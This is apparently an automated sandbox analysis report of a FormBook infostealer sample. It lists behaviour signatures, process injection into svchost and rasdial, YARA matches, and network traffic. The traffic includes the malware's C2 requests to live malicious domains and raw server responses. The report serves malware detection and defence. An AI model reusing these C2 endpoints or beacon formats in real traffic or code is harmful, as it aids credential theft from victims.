Windows Analysis Report
220204-TF1--00.exe

Overview

General Information

Sample name: 220204-TF1--00.exe
Analysis ID: 1503946
MD5: 7054b5f008cd2514db7b7cda8149978a
SHA1: 831951c823052e1e2537006e617c29b4f0f864d2
SHA256: c2f4d2c93d321bffcb638ea1c04436cc5d3837af03c9ad2517e7f4d2eebce887
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 220204-TF1--00.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\220204-TF1--00.exe" MD5: 7054B5F008CD2514DB7B7CDA8149978A)
    • svchost.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\220204-TF1--00.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sXIYDUFnJY.exe (PID: 4908 cmdline: "C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 8032 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • sXIYDUFnJY.exe (PID: 5440 cmdline: "C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6780 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: juju4 | Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe" , ParentImage: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe, ParentProcessId: 4908, ParentProcessName: sXIYDUFnJY.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 8032, ProcessName: rasdial.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ParentImage: C:\Users\user\Desktop\220204-TF1--00.exe, ParentProcessId: 7628, ParentProcessName: 220204-TF1--00.exe, ProcessCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ProcessId: 7676, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ParentImage: C:\Users\user\Desktop\220204-TF1--00.exe, ParentProcessId: 7628, ParentProcessName: 220204-TF1--00.exe, ProcessCommandLine: "C:\Users\user\Desktop\220204-TF1--00.exe", ProcessId: 7676, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: http://www.weep.site/v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT | Avira URL Cloud: Label: malware
Source: 220204-TF1--00.exe | ReversingLabs: Detection: 28%
Source: 220204-TF1--00.exe | Virustotal: Detection: 30%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 220204-TF1--00.exe | Joe Sandbox ML: detected
Source: 220204-TF1--00.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXIYDUFnJY.exe, 00000005.00000002.4130102860.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2098859139.0000000000D3E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasdial.pdb source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006E4696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_006E4696
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006EC93C FindFirstFileW,FindClose, 0_2_006EC93C
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_006EC9C7
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_006EF200
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_006EF35D
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_006EF65E
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006E3A2B
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006E3D4E
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_006EBF27
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_02F1C420 FindFirstFileW,FindNextFileW,FindClose, 6_2_02F1C420
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 4x nop then xor eax, eax 6_2_02F09B60
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 4x nop then pop edi 6_2_02F0E109
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 4x nop then mov ebx, 00000004h 6_2_04CD04DF

Networking

Source: DNS query: www.jaxo.xyz
Source: Joe Sandbox View | IP Address: 176.57.64.102 176.57.64.102
Source: Joe Sandbox View | IP Address: 167.172.133.32 167.172.133.32
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 identical entries)
Source: C:\Users\user\Desktop\220204-TF1--00.exe | Code function: 0_2_006F25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_006F25E2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 04 Sep 2024 07:37:10 GMTserver: Apacheset-cookie: __tad=1725435430.3329141; expires=Sat, 02-Sep-2034 07:37:10 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 
57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 04 Sep 2024 07:37:12 GMTserver: Apacheset-cookie: __tad=1725435432.1598786; expires=Sat, 02-Sep-2034 07:37:12 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 
57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 04 Sep 2024 07:37:15 GMTserver: Apacheset-cookie: __tad=1725435435.2574839; expires=Sat, 02-Sep-2034 07:37:15 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 577content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 
57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00 Data Ascii: TMo0=/bDJ7JH@*Jsaq6Pc|7o0&ok(oPV M-Uc(r'}EL#q'7;UZ5iCBNe.RF:pXi~CIC/nxHA;bN+g=*k*dwB>jCl=n= x!S&H[m{+*C4jSmZ%*sRadQDn\'p6(#MO7 gcuuN>pJ:k4Yl|bEYM0iCQrllgC? 'av#"h>UZgw+P;wrhcFCL<9_K8G0oI=v1.ERi`URupZABWXN!q^x?)b71x_Wece
            Source: global trafficHTTP traffic detected: GET /v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT HTTP/1.1Host: www.weep.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT HTTP/1.1Host: www.88nn.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
